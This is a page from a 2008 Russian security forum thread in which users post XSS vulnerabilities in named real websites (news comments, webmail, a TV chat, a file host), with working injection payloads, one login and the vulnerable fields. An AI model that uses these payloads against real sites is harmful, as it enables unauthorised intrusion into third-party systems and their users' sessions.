ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #221  
Старый 11.07.2008, 03:46
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

http://vip-file.com
Заливаем .html файл с ксской ..
Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html

---------
Жаль, что ток у мну пашет ( -deleted-

Последний раз редактировалось BlackSun; 11.07.2008 в 14:11..
 

  #222  
Старый 12.07.2008, 15:16
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от BlackSun  
http://vip-file.com
Заливаем .html файл с ксской ..
Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html

---------
Жаль, что ток у мну пашет ( -deleted-
пашет!

пример http://r27.vip-file.com:81/download9/12-6c6fdb33afc47e1c2f817a460aa79c40/as.html
 

  #223  
Старый 13.07.2008, 10:12
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

20minut.ua PR 4
Цитата:
http://20minut.ua/?lang_code=1%22%3E%3Cscript%3Ealert('hacked%20by%2 0VITAL')%3C/script%3E&url=http://vital.h.com.ua
активка - сам очень удивился после того как ввел это в строку... после чего зашев на 20minut.ua я увидел свой алерт )

Последний раз редактировалось sabe; 13.07.2008 в 10:15..
 

  #224  
Старый 17.07.2008, 04:12
-=Static=-
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме:
347573

Репутация: 185
По умолчанию

_http://www.e-xoopport.it/modules/news/

Активная XSS в системе комментариев, в теле сообщения!) Не фильтруется вообще ничего)
 

  #225  
Старый 19.07.2008, 19:10
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

NextMail.ru

Активная ксс, старенькая, но ужось, все еще пашет

Шлем письмо ..
Цитата:
<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value='javascript:alert();'></object>
 

  #226  
Старый 03.08.2008, 12:50
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

http://novy.tv/services/chat/
Чат "Нового Канала"

Если кто узнает движок, сообщите плз, такой же у прова стоит...

Регаемся, заходим (visto:visto)

Слева, там где Интонация, выбираем "настройка", добавляем свой вариант -
Цитата:
"><script>alert(/Dimi4/)</script>
В меню --- записная книжка --- добавляем запись:

Цитата:
%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2 f%44%69%6d%69%34%2f%29%3c%2f%73%63%72%69%70%74%3e
Ну вообщем может кому пригодится..
и еще фича: если написать в чате сообщение !b blabla !
то текст blabla беоеться в теги
Цитата:
<b> blabla </b>
 

  #227  
Старый 04.08.2008, 01:14
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

iol.pt
Активная XSS в почте,
Идем в яшик ( http://webmail.iol.pt/horde/dimp/#folder:INBOX )
Шлем письмо,
Para: - кому,
Assunto: - ксс - <script>alert()</script><noscript>

// BlackSun
 

  #228  
Старый 04.08.2008, 14:20
Frozzeg
Новичок
Регистрация: 20.07.2008
Сообщений: 5
Провел на форуме:
19093

Репутация: 6
По умолчанию

krasnodar2000.ru

Активная XSS в комментах новостей
Уязвимые поля "Ваше имя", "Город"
 

  #229  
Старый 04.08.2008, 14:36
Frozzeg
Новичок
Регистрация: 20.07.2008
Сообщений: 5
Провел на форуме:
19093

Репутация: 6
По умолчанию

nevasport.ru


Активная XSS в комментах новостей
Уязвимое поле "Ваше имя"
 

  #230  
Старый 05.08.2008, 21:15
Frozzeg
Новичок
Регистрация: 20.07.2008
Сообщений: 5
Провел на форуме:
19093

Репутация: 6
По умолчанию

seonews.ru

Активная XSS в комментах новостей
Уязвимое поле "Имя"

Последний раз редактировалось Frozzeg; 05.08.2008 в 21:23..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ